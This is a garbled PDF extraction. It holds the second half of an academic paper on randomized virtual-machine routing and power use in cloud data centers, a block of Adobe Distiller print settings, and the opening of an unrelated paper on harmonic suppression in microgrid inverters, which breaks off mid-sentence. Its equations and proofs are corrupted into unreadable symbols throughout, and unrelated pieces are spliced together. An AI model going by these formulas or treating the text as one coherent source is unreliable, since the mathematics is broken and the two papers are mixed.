optimization problem can be formulated as follows: min ~r X i2P Exp½Wi� (10) s:t: X i2P ri ¼ 1 (11) pi;100 � e 8i 2 P (12) �i ¼ �ri 8i 2 P (13) Let us rewrite the optimization problem by changing our optimization variable from ~r ¼ r1; r2; :::; rjPj � � to ~x ¼ x1; x2; :::; xjPj � � which is defined below xi ¼ �i m ¼ �ri m (14) Using Eq. (14) and putting Eq. (1) for k = 100 in Eq. (12) we get x100i 100! P100 k¼0 xki k! � e (15) Khani and Khanmirza (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.211 7/14 http://dx.doi.org/10.7717/peerj-cs.211 https://peerj.com/computer-science/ If we can solve this inequality constraint for xi then we have a simple inequality constraint in the form of xi < f(ε). Fortunately, numerical methods can be used to solve it. We show numerical results β for some practical values of ε in Table 1. For example, in the first row, we have β = 100 for ε = 0.1. It means that if we send VMs with a rate below 100 (xi < β = 100) to PM i then we will guarantee that the probability of SLAV is below 0.1 (Pr(SLAV) < ε = 0.1) for that PM. The equivalent optimization problem will be min ~r foð~xÞ ¼ X i2P gðxiÞ (16) s:t: X i2P xi ¼ � m (17) xi � b 8i 2 P (18) in which gðxÞ ¼ a þ 1X100 k¼0 xk k! �a þ b X100 k¼1 k xk k! ! (19) The c(x) can be obtained using Eqs. (1), (2) and (7) with ease. We set a = 22 and b = 0.73 for a PM equipped with Intel Xeon E3 processor (spec.org, 2018). Then, we can show that the first order derivative of c(x) is positive (c′(x) > 0) and the second order derivative of c(x) is negative (c″(x) < 0) for (0 � x � 100) with numerical methods. Theorem 1. For any x and y (0 < y � x � β), there exists d (0 < d � y and 0 < d � β - x), so that gðx þ dÞ þ gðy � dÞ � gðxÞ þ gðyÞ (20) Proof: c″(x) < 0 means that the derivative (c′(x)) is nonincreasing. The condition y � x implies that the c′(x) � c′(y). Using definition of derivative and 0 < c′(x), we obtain 0 < gðx þ dÞ � gðxÞ d � gðyÞ � gðy � dÞ d (21) Multiplying the above inequality by d and adding c(y - d) + c(x) yields Eq. (20). Let X denotes the set of elements of ~x. We define �ð~xÞ ¼ fx 2 Xj0 < x < bg. Table 1 Numerical results for maximum incoming rate (xi < β) based on acceptable SLAV probability (ε). SLAV probability (ε) Maximum rate (β) 0.1 100 0.05 95 10-3 80 10-4 73 10-5 69 Khani and Khanmirza (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.211 8/14 http://dx.doi.org/10.7717/peerj-cs.211 https://peerj.com/computer-science/ Theorem 2. The size of the subset � for minimal vector is at most one. Proof: Consider ~x which satisfies Eqs. (17)–(18) and �ð~xÞj >j . In our proof, we define a method to transform ~x to x0 ! . Then we show the following properties for the transformation. 1. The value of fo for the transformed ~x is not greater than the original ~x foðx0 ! Þ � foðx !Þ (22) 2. The transformation has convergence property. If we repeat the transformation we reach x� ! where �ðx�!Þ � 1 and we could not apply transformation anymore. First the definition of transformation, because �ð~xÞj j > 1, we can find xi and xj from �ð~xÞ where 0 < xi < β and 0 < xj < β. Without loss of generality, assume 0 < xi � xj < β. We have two cases for xi + xj: (1) xi + xj � β, (2) xi + xj < β. In the first case, we define d = β - yi and then change only the value xi and xj in ~x to get x0 ! as follows: x0i ¼ xi þ d ¼ b (23) x0j ¼ xj � d (24) In the second case, we define d = yj and then change only the value xi and xj in x ! as follows x0i ¼ xi þ xj (25) x0j ¼ 0 (26) Note that x0i þ x0j ¼ xi þ xj and the constraint Eq. (17) is still satisfied by x0 ! . After defining transformation, we prove the first property. Using Theorem 1 with defined d, we can conclude gðxi þ dÞ þ gðxj þ dÞ ¼ gðx0iÞ þ gðx0jÞ � gðxiÞ þ gðxjÞ (27) Adding unchanged elements of x! to both sides of above inequality, yields Eq. (22). For the proof of the second property, consider Eqs. (23) and (26). These imply that at least one of xi or xj will not be in the subset �ðx0 !Þ. Then the size of subset F is decreased by the transformation as follows j�ð~xÞj � j�ðx0!Þj ¼ 1 for xi 6¼ xj 2 for xi ¼ xj ¼ b 2 ( (28) Because �ð~xÞj j > 0 it will reach 1 or 0 eventually and more transformation is not possible. At this point, due to the first property Eq. (22) we reach a minimal vector. Without loss of generality we assume that the elements of the minimal vector are ordered x�1 � x�2 � ::: � x�jPj. The minimal (solution) of Eqs. (17) and (18) will be Khani and Khanmirza (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.211 9/14 http://dx.doi.org/10.7717/peerj-cs.211 https://peerj.com/computer-science/ x�i ¼ b for 1 � i � n� � m � bn� for i ¼ n� þ 1 0 for others 8>< >: (29) where n� ¼ 1 bm j k is the number of PMs which must be filled completely (up to β). The remaining load (if exists) must be dispatched to the next PM. For large scale data centers, we can neglect this PM and show the solution of Eqs. (10)–(13) as follows. r�i ¼ 1 n� for 1 � i � n� 0 for others ( (30) For implementation, we only need a random generator. When a new VM arrives, we draw i form [1, n�] and sends this VM to PM i. We do not require any polling, therefore our implementation is simple and agile as we need it in a cloud data center. SIMULATION RESULTS To validate the analytical solution, we have built a discrete event simulator of a CP data center using MATLAB (2012). We have considered the system with two different sojourn time distribution: exponential and uniform. In both cases the mean sojourn time is fixed at m = 101. The mean inter arrival time of VMs was made variable from (l = 104 to 108) to give reasonable insight into the behavior and dimensioning of CP data centers. Regarding l and m, traffic intensity varies from 104 to 108 which represents the mean number of VMs in data center at steady state according to the Little formula. The number of active PMs according to � n� ¼ � bm � depends indirectly on ε, e.g., for ε = 10-5 (β = 69) it varies from 145 to 145,000 servers. The values chosen may be quite applicable to small- to large-sized CPs data centers that try to keep the utilization of their servers as high as possible while guarantee a minimum QoS for the users. It is noteworthy that no CP published information regarding average traffic intensity, number of servers or the percentage of reserved. We generate confidence intervals (95%) for steady state measurement using independent replications with deletions method. First, we run 50 independent replications of each simulation, then we remove samples of transient phase and finally we calculate the sample mean. Figure 3 depicts the SLAV probability in data center at steady state. Simulation results follows analytical model perfectly for all � m and β, values. This observation supports the validity of the analytical model findings. As can be seen, probability for exponential sojourn time is generally less than probability for uniform one. Note that the mean time is the same for both distribution, and this may relates to the variance. The variance of exponential is about 10, but the variance of uniform is about 30. As the number of active servers increases, the SLAV probability decreased steadily. This trend is due to the fact that with more active servers, an arriving VM has more places to be hosted and the chance of blocking and SLAV is lower. Figure 4 shows the effect of sojourn time distribution on the convergence time. The data center with exponential sojourn time reaches to steady state sooner than a data center with uniform sojourn time. We only show the results for β = 100, l = 105, m = 10 because the Khani and Khanmirza (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.211 10/14 http://dx.doi.org/10.7717/peerj-cs.211 https://peerj.com/computer-science/ 102 104 106 Optimal Active PMs (n*) 7 7.5 8 8.5 9 9.5 10 S LA V P ro b. 10-6 (a) = 69 SIM exp SIM uni Analytical Model 102 104 106 Optimal Active PMs (n*) 7 7.5 8 8.5 9 9.5 10 S LA V P ro b. 10-5 (b) = 73 SIM exp SIM uni Analytical Model 102 104 106 Optimal Active PMs (n*) 7.5 8 8.5 9 9.5 10 S LA V P ro b. 10-4 (c) = 80 SIM exp SIM uni Analytical Model 102 104 106 Optimal Active PMs (n*) 0.04 0.045 0.05 S LA V P ro b. (d) SLAV = 95 SIM exp SIM uni Analytical Model 102 104 106 Optimal Active PMs (n*) 0.08 0.085 0.09 0.095 0.1 S LA V P ro b. (e) = 100 SIM exp SIM uni Analytical Model Figure 3 SLAV probability in data center at steady state for various β (A) β = 69 (B) β = 73 (C) β = 80 (D) β = 95, (E) β = 100. Full-size DOI: 10.7717/peerj-cs.211/fig-3 0 0.5 1 1.5 2 2.5 3 Time (min) 105 0 10 20 30 40 50 60 N um be r of S LA V = 100 = 105 = 10 exp uni Figure 4 Effect of sojourn time distribution on the convergence time. Full-size DOI: 10.7717/peerj-cs.211/fig-4 Khani and Khanmirza (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.211 11/14 http://dx.doi.org/10.7717/peerj-cs.211/fig-3 http://dx.doi.org/10.7717/peerj-cs.211/fig-4 http://dx.doi.org/10.7717/peerj-cs.211 https://peerj.com/computer-science/ discussion aims to highlight the influences of distribution on convergence time; for larger systems and lower probability, the discussion is the same. In order to study the power consumption of our method in practice, we use Google trace (Reiss, Wilkes & Hellerstein, 2011) which consists of several concurrent VMs in a single ∼12K server farm where the resource demand of VMs is highly dynamic and needs quick decisions. Figure 5 compares the power consumption for our method with two benchmark algorithms in the literature: PABFD (Beloglazov & Buyya, 2012) and MT (Domanal & Reddy, 2013). The power consumption in our method is just about 2% more than PABFD and MT. This higher power consumption is acceptable, because the workload is highly dynamic, varying over time, and is driven by many short jobs that demand quick scheduling decisions and updates. PABFD and MT suffers from long decision process and overwhelming migrations. These shortcomings make both of them fruitless in real world cloud computing scenarios. The comparison gives us an idea about how far we are from idealistic benchmark algorithms in the literature. CONCLUSION Effective resource management is a major challenge for the leading CPs (e.g., Google, Microsoft, Amazon). Performance evaluation of data centers is an important aspect of resource management which is of crucial interest for both CPs and cloud users. In this paper, we proposed an analytical model based on the M/G/n/n system for performance evaluation of a cloud computing data center. Due to the nature of the cloud computing, we assumed general sojourn time for VMs as well as large number of PMs. These assumptions make our model acceptable in terms of scale and diversity. Through extensive numerical simulations, we showed that our analytical model closely alignes with simulation results. Our results also indicate that our method consumes a bit more power than idealistic benchmark in the literature. In the future, we plan to extend our model for variable size VMs. Studying how “Power of Two Choice” can improve the result of randomized dispatcher will be another dimension of extension. 0 20 40 60 80 100 Time (min) 7000 7100 7200 7300 7400 7500 P ow er ( W at t) RD MT PABFD Figure 5 Power consumption by a data center managed by random dispatcher and benchmark algorithms. Full-size DOI: 10.7717/peerj-cs.211/fig-5 Khani and Khanmirza (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.211 12/14 http://dx.doi.org/10.7717/peerj-cs.211/fig-5 http://dx.doi.org/10.7717/peerj-cs.211 https://peerj.com/computer-science/ ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Hadi Khani conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work. � Hamed Khanmirza analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft, writing, Latex. Data Availability The following information was supplied regarding data availability: The source code is available in the Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.211#supplemental-information. REFERENCES Beloglazov A, Buyya R. 2012. Optimal online deterministic algorithms and adaptive heuristics for energy and performance efficient dynamic consolidation of virtual machines in Cloud data centers. Concurrency and Computation: Practice and Experience 24(13):1397–1420 DOI 10.1002/cpe.1867. Boxma OJ, Cohen J, Huffels N. 1979. Approximations of the mean waiting time in an M/G/s queueing system. Operations Research 27(6):1115–1127. Carvalho M, Menasce D, Brasileiro F. 2015. Prediction-based admission control for IaaS Clouds with multiple service classes. In: 2015 IEEE 7th International Conference on Cloud Computing Technology and Science (CloudCom). Piscataway: IEEE, 82–90. Domanal SG, Reddy GRM. 2013. Load balancing in cloud computing using modified throttled algorithm. In: 2013 IEEE International Conference on Cloud Computing in Emerging Markets (CCEM), Piscataway: IEEE, 1–5. Kelly FP. 1991. Loss networks. Annals of Applied Probability 1(3):319–378. Kimura T. 1983. Diffusion approximation for an M/G/m queue. Operations Research 31(2):304–321. Kimura T. 1996. A transform-free approximation for the finite capacity M/G/s queue. Operations Research 44(6):984–988 DOI 10.1287/opre.44.6.984. Ma BN, Mark JW. 1995. Approximation of the mean queue length of an M/G/c queueing system. Operations Research 43(1):158–165 DOI 10.1287/opre.43.1.158. MATLAB. 2012. version 7.14.0 (R2010a). Natick: The MathWorks Inc. Khani and Khanmirza (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.211 13/14 http://dx.doi.org/10.7717/peerj-cs.211#supplemental-information http://dx.doi.org/10.7717/peerj-cs.211#supplemental-information http://dx.doi.org/10.7717/peerj-cs.211#supplemental-information http://dx.doi.org/10.1002/cpe.1867 http://dx.doi.org/10.1287/opre.44.6.984 http://dx.doi.org/10.1287/opre.43.1.158 http://dx.doi.org/10.7717/peerj-cs.211 https://peerj.com/computer-science/ Miyazawa M. 1986. Approximation of the queue-length distribution of an M/GI/s queue by the basic equations. Journal of Applied Probability 23(2):443–458 DOI 10.2307/3214186. Nozaki SA, Ross SM. 1978. Approximations in finite-capacity multi-server queues by poisson arrivals. Journal of Applied Probability 15(4):826–834 DOI 10.2307/3213437. Reiss C, Wilkes J, Hellerstein JL. 2011. Google cluster-usage traces: format + schema. Technical Report. Mountain View: Google Inc. Shojafar M, Cordeschi N, Baccarelli E. 2016. Energy-efficient adaptive resource management for real-time vehicular cloud services. IEEE Transactions on Cloud Computing 7(1):196–209 DOI 10.1109/tcc.2016.2551747. Smith JM. 2003. M/G/c/k blocking probability models and system performance. Performance Evaluation 52(4):237–267 DOI 10.1016/s0166-5316(02)00190-6. spec.org. 2018. All SPECpower_ssj 2008 benchmark results. Available at http://www.spec.org/ (accessed November 2018). Tijms HC, Van Hoorn MH, Federgruen A. 1981. Approximations for the steady-state probabilities in the M/G/c queue. Advances in Applied Probability 13(1):186–206 DOI 10.2307/1426474. Trivedi KS. 2001. Probability and statistics with reliability, queueing, and computer science applications. Second edition. New York: John Wiley & Sons, Inc. Wang B, Chang X, Liu J. 2015. Modeling heterogeneous virtual machines on IaaS data centers. IEEE Communications Letters 19(4):537–540 DOI 10.1109/lcomm.2015.2403832. Wang L, Gelenbe E. 2015. Adaptive dispatching of tasks in the cloud. IEEE Transactions on Cloud Computing 6(1):33–45 DOI 10.1109/tcc.2015.2474406. Wang W, Jiang Y, Wu W. 2016. Multiagent-based resource allocation for energy minimization in cloud computing systems. IEEE Transactions on Systems, Man, and Cybernetics: Systems 47(2):205–220 DOI 10.1109/TSMC.2016.2523910. Yang B, Tan F, Dai YS, Guo S. 2009. Performance evaluation of cloud service considering fault recovery. In: Jaatun MG, Zhao G, Rong C, eds. Cloud Computing. CloudCom 2009. Lecture Notes in Computer Science. Vol. 5931. Berlin, Heidelberg: Springer, 571–576. Yao DD. 1985. Refining the diffusion approximation for the M/G/m queue. Operations Research 33(6):1266–1277. Yue M. 1991. A simple proof of the inequality FFD (L) � 11/9 OPT (L) + 1, ∀L for the FFD bin-packing algorithm. Acta Mathematicae Applicatae Sinica 7(4):321–331. Khani and Khanmirza (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.211 14/14 http://dx.doi.org/10.2307/3214186 http://dx.doi.org/10.2307/3213437 http://dx.doi.org/10.1109/tcc.2016.2551747 http://dx.doi.org/10.1016/s0166-5316(02)00190-6 http://www.spec.org/ http://dx.doi.org/10.2307/1426474 http://dx.doi.org/10.1109/lcomm.2015.2403832 http://dx.doi.org/10.1109/tcc.2015.2474406 http://dx.doi.org/10.1109/TSMC.2016.2523910 http://dx.doi.org/10.7717/peerj-cs.211 https://peerj.com/computer-science/ Randomized routing of virtual machines in IaaS data centers Introduction Related Work System Model Optimization Problem Simulation Results Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_t4zfmm6xmrhzlkr2cb7ksjcyvu ---- International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 DOI: 10.21307/ijanmc-2019-003 23 Research on Multi - Resonant LCL Harmonic Suppression Strategy Jingwen Chen, Xin Zhou and Hongshe Dang* School of electrical and information engineering Shaanxi University of Science and Technology Shaanxi 710021, China *Address correspondence to this author at xuefu Road, Xi'an, China, 710021; e-mail: 2452744621@qq.com Abstract—Aiming at the resonance problem in the process of grid connection of LCL filter microgrid inverter, a multi-resonance LCL harmonic suppression strategy is proposed. On the basis of analyzing the principle and establishing the mathematical model in detail, the realization process of the multi-resonance constant power compound control strategy is studied emphatically. Through the simulation, the validity of the control strategy is verified, The results show that the scheme stabilizes the output power and reduces the total harmonic distortion of the grid-connected inverter to 0.12%, and the corresponding phase current distortion rate drops to 0.02%.The suppression effect is obvious, it is an effective harmonic suppression method. Keywords-Microgrid Inverter;Harmonic;Multi Resonance Control;Constant Power Control I. INTRODUCTION With the depletion of traditional energy sources, the new energy power generation system with microgrid as the carrier has been developed rapidly because of its flexible, decentralized, small, close to users and the use of clean energy. Due to the energy structure of the micro grid mainly clean energy such as wind power, photovoltaic power generation, the distributed energy will generally need electricity to the grid through power electronic converter device to realize grid connected. Therefore, a lot of power electronic devices access to power grid harmonics, caused the converter power factor lower and parallel resonant circuit or series resonance, decrease active reactive power measurement accuracy, 